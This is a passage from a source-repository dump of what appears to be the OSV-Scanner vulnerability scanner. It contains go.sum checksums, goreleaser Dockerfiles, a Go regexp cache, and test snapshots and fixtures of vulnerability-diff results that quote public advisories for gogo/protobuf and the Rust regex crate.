google.golang.org/grpc v1.79.3 h1:sybAEdRIEtvcD68Gx7dmnwjZKlyfuc61Dyo9pGXXkKE= google.golang.org/grpc v1.79.3/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= gopkg.in/dnaeon/go-vcr.v4 v4.0.6 h1:PiJkrakkmzc5s7EfBnZOnyiLwi7o7A9fwPzN0X2uwe0= gopkg.in/dnaeon/go-vcr.v4 v4.0.6/go.mod h1:sbq5oMEcM4PXngbcNbHhzfCP9OdZodLhrbRYoyg09HY= gopkg.in/ini.v1 v1.67.1 h1:tVBILHy0R6e4wkYOn3XmiITt/hEVH4TFMYvAX2Ytz6k= gopkg.in/ini.v1 v1.67.1/go.mod h1:x/cyOwCgZqOkJoDIJ3c1KNHMo10+nLGAhh+kn3Zizss= gopkg.in/warnings.v0 v0.1.2 h1:wFXVbFY8DY5/xOe1ECiWdKCzZlxgshcYVNkBHstARME= gopkg.in/warnings.v0 v0.1.2/go.mod h1:jksf8JmL6Qr/oQM2OXTHunEvvTAsrWBLb6OOjuVWRNI= gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gotest.tools/v3 v3.5.1 h1:EENdUnS3pdur5nybKYIh2Vfgc8IUNBjxDPSjtiJcOzU= gotest.tools/v3 v3.5.1/go.mod h1:isy3WKz7GK6uNw/sbHzfKBLvlvXwUyV06n6brMxxopU= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= modernc.org/cc/v4 v4.26.2 h1:991HMkLjJzYBIfha6ECZdjrIYz2/1ayr+FL8GN+CNzM= modernc.org/cc/v4 v4.26.2/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0= modernc.org/ccgo/v4 v4.28.0 h1:rjznn6WWehKq7dG4JtLRKxb52Ecv8OUGah8+Z/SfpNU= modernc.org/ccgo/v4 v4.28.0/go.mod h1:JygV3+9AV6SmPhDasu4JgquwU81XAKLd3OKTUDNOiKE= modernc.org/fileutil v1.3.8 h1:qtzNm7ED75pd1C7WgAGcK4edm4fvhtBsEiI/0NQ54YM= modernc.org/fileutil v1.3.8/go.mod h1:HxmghZSZVAz/LXcMNwZPA/DRrQZEVP9VX0V4LQGQFOc= modernc.org/gc/v2 v2.6.5 h1:nyqdV8q46KvTpZlsw66kWqwXRHdjIlJOhG6kxiV/9xI= modernc.org/gc/v2 v2.6.5/go.mod h1:YgIahr1ypgfe7chRuJi2gD7DBQiKSLMPgBQe9oIiito= modernc.org/goabi0 v0.2.0 h1:HvEowk7LxcPd0eq6mVOAEMai46V+i7Jrj13t4AzuNks= modernc.org/goabi0 v0.2.0/go.mod h1:CEFRnnJhKvWT1c1JTI3Avm+tgOWbkOu5oPA8eH8LnMI= modernc.org/libc v1.66.3 h1:cfCbjTUcdsKyyZZfEUKfoHcP3S0Wkvz3jgSzByEWVCQ= modernc.org/libc v1.66.3/go.mod h1:XD9zO8kt59cANKvHPXpx7yS2ELPheAey0vjIuZOhOU8= modernc.org/mathutil v1.7.1 h1:GCZVGXdaN8gTqB1Mf/usp1Y/hSqgI2vAGGP4jZMCxOU= modernc.org/mathutil v1.7.1/go.mod h1:4p5IwJITfppl0G4sUEDtCr4DthTaT47/N3aT6MhfgJg= modernc.org/memory v1.11.0 h1:o4QC8aMQzmcwCK3t3Ux/ZHmwFPzE6hf2Y5LbkRs+hbI= modernc.org/memory v1.11.0/go.mod h1:/JP4VbVC+K5sU2wZi9bHoq2MAkCnrt2r98UGeSK7Mjw= modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8= modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns= modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w= modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE= modernc.org/sqlite v1.38.0 h1:+4OrfPQ8pxHKuWG4md1JpR/EYAh3Md7TdejuuzE7EUI= modernc.org/sqlite v1.38.0/go.mod h1:1Bj+yES4SVvBZ4cBOpVZ6QgesMCKpJZDq0nxYzOpmNE= modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0= modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A= modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y= modernc.org/token v1.1.0/go.mod h1:UGzOrNV1mAFSEB63lOFHIpNRUVMvYTc6yu1SMY/XTDM= osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f h1:B0XTb5DYHKy+Fy/z2BFgnBeTik2yPAcUDiPNnqouxGI= osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f/go.mod h1:OVdSVs0ycryhh/ctD+AzobnK9YwV0ap9487js1AYP9M= sigs.k8s.io/yaml v1.4.0/go.mod h1:Ejl7/uTz7PSA4eKMyQCUTnhZYNmLIl+5c2lQPGR2BPY= sigs.k8s.io/yaml v1.6.0 h1:G8fkbMSAFqgEFgh4b1wmtzDnioxFCUgTZhlbj5P9QYs= sigs.k8s.io/yaml v1.6.0/go.mod h1:796bPqUfzR/0jLAl6XjHl3Ck7MiyVv8dbTdyT3/pMf4= www.velocidex.com/golang/go-ntfs v0.2.0 h1:JLS4hOQLupiVzo+1z4Xb8AZyIaXHDmiGnKyoM/bRYq0= www.velocidex.com/golang/go-ntfs v0.2.0/go.mod h1:itvbHQcnLdTVIDY6fI3lR0zeBwXwBYBdUFtswE0x1vc= www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7 h1:BMX/37sYwX+8JhHt+YNbPfbx7dXG1w1L1mXonNBtjt0= www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7/go.mod h1:pxSECT5mWM3goJ4sxB4HCJNKnKqiAlpyT8XnvBwkLGU= ================================================ FILE: goreleaser-action.dockerfile ================================================ # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 RUN apk --no-cache add \ ca-certificates \ git \ bash # Allow git to run on mounted directories RUN git config --global --add safe.directory '*' # Built binaries provided by goreleaser WORKDIR /root/ COPY ./osv-scanner-action ./osv-scanner COPY ./osv-reporter ./ COPY ./exit_code_redirect.sh ./ ENV PATH="${PATH}:/root" ENTRYPOINT ["bash", "/root/exit_code_redirect.sh"] ================================================ FILE: goreleaser.dockerfile ================================================ # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039 RUN apk add --no-cache \ ca-certificates \ git # Allow git to run on mounted directories RUN git config --global --add safe.directory '*' WORKDIR / COPY osv-scanner ./ ENTRYPOINT ["/osv-scanner"] ================================================ FILE: internal/cachedregexp/regex.go ================================================ // Package cachedregexp provides a cached version of regexp.MustCompile and regexp.Compile. package cachedregexp import ( "regexp" "sync" ) var cache sync.Map func MustCompile(exp string) *regexp.Regexp { compiled, ok := cache.Load(exp) if !ok { compiled, _ = cache.LoadOrStore(exp, regexp.MustCompile(exp)) } return compiled.(*regexp.Regexp) } // Compile returns a compiled regexp or an error if the pattern is invalid. // Results are cached for performance. func Compile(exp string) (*regexp.Regexp, error) { compiled, ok := cache.Load(exp) if ok { return compiled.(*regexp.Regexp), nil } r, err := regexp.Compile(exp) if err != nil { return nil, err } cache.LoadOrStore(exp, r) return r, nil } ================================================ FILE: internal/ci/__snapshots__/vulnerability_result_diff_test.snap ================================================ [TestDiffVulnerabilityByUniqueVulnCountResults/new_has_one_less_vuln - 1] {} --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_everything - 1] {} --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_package_with_new_vuln - 1] { "GHSA-c3h9-896r-86jm": 1 } --- [TestDiffVulnerabilityByUniqueVulnCountResults/same_packages_with_different_source_path - 1] {} --- [TestDiffVulnerabilityResults/new_has_one_less_vuln - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/new_vuln_and_packages - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "max_severity": "8.6" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "type": "CVSS_V3" } ], "summary": "Improper Input Validation in GoGo Protobuf" } ] } ] }, { "source": { "path": "/path/to/scorecard-check-osv-e2e/sub-rust-project/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-m5pq-gvj9-9vr8/GHSA-m5pq-gvj9-9vr8.json" }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-03-08T20:00:36Z", "nvd_published_at": "2022-03-08T19:15:00Z", "severity": "HIGH" }, "details": "\u003e This is a cross-post of [the official security advisory][advisory]. The official advisory contains a signed version with our PGP key, as well.\n\n[advisory]: https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n\nThe Rust Security Response WG was notified that the `regex` crate did not properly limit the complexity of the regular expressions (regex) it parses. An attacker could use this security issue to perform a denial of service, by sending a specially crafted regex to a service accepting untrusted regexes. No known vulnerability is present when parsing untrusted input with trusted regexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability is \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses of the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately to the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, we do not recommend denying known problematic regexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy](https://www.rust-lang.org/policies/security), and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini for coordinating the disclosure and writing this advisory.", "id": "GHSA-m5pq-gvj9-9vr8", "modified": "2022-08-11T20:38:52Z", "published": "2022-03-08T20:00:36Z", "references": [ { "type": "WEB", "url": "https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24713" }, { "type": "WEB", "url": "https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e" }, { "type": "PACKAGE", "url": "https://github.com/rust-lang/regex/" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-08" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-14" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5113" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5118" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Rust's regex crate vulnerable to regular expression denial of service" }, { "affected": [ { "database_specific": { "categories": [ "denial-of-service" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0013.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "1.5.5" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-24713", "GHSA-m5pq-gvj9-9vr8" ], "details": "The Rust Security Response WG was notified that the `regex` crate did not\nproperly limit the complexity of the regular expressions (regex) it parses. An\nattacker could use this security issue to perform a denial of service, by\nsending a specially crafted regex to a service accepting untrusted regexes. No\nknown vulnerability is present when parsing untrusted input with trusted\nregexes.\n\nThis issue has been assigned CVE-2022-24713. The severity of this vulnerability\nis \"high\" when the `regex` crate is used to parse untrusted regexes. Other uses\nof the `regex` crate are not affected by this vulnerability.\n\n## Overview\n\nThe `regex` crate features built-in mitigations to prevent denial of service\nattacks caused by untrusted regexes, or untrusted input matched by trusted\nregexes. Those (tunable) mitigations already provide sane defaults to prevent\nattacks. This guarantee is documented and it's considered part of the crate's\nAPI.\n\nUnfortunately a bug was discovered in the mitigations designed to prevent\nuntrusted regexes to take an arbitrary amount of time during parsing, and it's\npossible to craft regexes that bypass such mitigations. This makes it possible\nto perform denial of service attacks by sending specially crafted regexes to\nservices accepting user-controlled, untrusted regexes.\n\n## Affected versions\n\nAll versions of the `regex` crate before or equal to 1.5.4 are affected by this\nissue. The fix is include starting from `regex` 1.5.5.\n\n## Mitigations\n\nWe recommend everyone accepting user-controlled regexes to upgrade immediately\nto the latest version of the `regex` crate.\n\nUnfortunately there is no fixed set of problematic regexes, as there are\npractically infinite regexes that could be crafted to exploit this\nvulnerability. Because of this, we do not recommend denying known problematic\nregexes.\n\n## Acknowledgements\n\nWe want to thank Addison Crump for responsibly disclosing this to us according\nto the [Rust security policy][1], and for helping review the fix.\n\nWe also want to thank Andrew Gallant for developing the fix, and Pietro Albini\nfor coordinating the disclosure and writing this advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "id": "RUSTSEC-2022-0013", "modified": "2023-06-13T13:10:24Z", "published": "2022-03-08T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/regex" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ], "summary": "Regexes with large repetitions on empty sub-expressions take a very long time to parse" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/old_package_replaced_with_new_package - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/brandnew/package", "version": "1.0.0", "ecosystem": "Go" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/old_vuln_and_packages_gone - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_everything - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_packages_but_with_one_moved - 1] { "results": [ { "source": { "path": "/path/to/different-dir/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GO-2021-0053" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-06-12T18:45:41Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.4.0", "summary": "Panic due to improper input validation in github.com/gogo/protobuf" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestDiffVulnerabilityResults/same_packages_with_new_vuln - 1] { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "max_severity": "8.6" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "type": "CVSS_V3" } ], "summary": "Improper Input Validation in GoGo Protobuf" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: internal/ci/testdata/not-json.txt ================================================ this is not valid json! (I think) ================================================ FILE: internal/ci/testdata/results-empty.json ================================================ { "results": [], "experimental_config": { "licenses": { "summary": true, "allowlist": ["MIT"] } } } ================================================ FILE: internal/ci/testdata/results-some.json ================================================ { "results": [ { "source": { "path": "/path/to/different-dir/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": "2023-06-12T18:45:41Z", "published": "2021-04-14T20:04:52Z", "schema_version": "1.4.0", "id": "GO-2021-0053", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "Panic due to improper input validation in github.com/gogo/protobuf", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "groups": [ { "ids": [ "GO-2021-0053" 